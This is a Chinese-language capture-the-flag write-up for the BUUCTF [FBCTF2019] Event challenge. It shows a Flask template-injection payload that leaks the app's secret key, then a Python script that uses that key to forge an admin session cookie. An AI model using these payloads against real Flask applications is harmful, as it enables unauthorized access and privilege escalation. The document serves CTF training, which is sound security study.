题目地址:https://buuoj.cn/challenges#[FBCTF2019]Event
![BUUCTF:[FBCTF2019]Event_Event](https://s2.51cto.com/images/blog/202306/19154743_6490081f0c39744360.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
![BUUCTF:[FBCTF2019]Event_模版_02](https://s2.51cto.com/images/blog/202306/19154743_6490081f2509887968.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
![BUUCTF:[FBCTF2019]Event_BUUCTF_03](https://s2.51cto.com/images/blog/202306/19154743_6490081f3f48827902.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
模版注入+Cookie伪造
Cookie:Im1vY2h1Ig.XyDM5A.RIObE23_pwucPR7ZAVNsm_cOwpU 加密方式未知,密钥未知
在提交数据的时候,有三个可控参数,经测试在event_important参数存在模版注入,输入__dict__,发现成功回显
![BUUCTF:[FBCTF2019]Event_flask_04](https://s2.51cto.com/images/blog/202306/19154743_6490081f584da21196.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
接着查找配置文件:__class__.__init__.__globals__[app].config
![BUUCTF:[FBCTF2019]Event_Event_05](https://s2.51cto.com/images/blog/202306/19154743_6490081f747e765544.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
发现密钥,开始伪造Cookie
from flask import Flask
from flask.sessions import SecureCookieSessionInterface
app = Flask(__name__)
app.secret_key = b'fb+wwn!n1yo+9c(9s6!_3o#nqm&&_ej$tez)$_ik36n8d7o6mr#y'
session_serializer = SecureCookieSessionInterface().get_signing_serializer(app)
@app.route('/')
def index():
print(session_serializer.dumps("admin"))
index()PS C:\Users\Administrator\Desktop> python .\exp.py
ImFkbWluIg.XyDKIw.wlPGRJ52VIGmXV5buLQ9-h-wt8w将生成的Cookie替换user中的Cookie然后访问Admin panel
![BUUCTF:[FBCTF2019]Event_FBCTF2019_06](https://s2.51cto.com/images/blog/202306/19154743_6490081f97e2697460.png?x-oss-process=image/watermark,size_16,text_QDUxQ1RP5Y2a5a6i,color_FFFFFF,t_30,g_se,x_10,y_10,shadow_20,type_ZmFuZ3poZW5naGVpdGk=/resize,m_fixed,w_1184 "在这里插入图片描述")
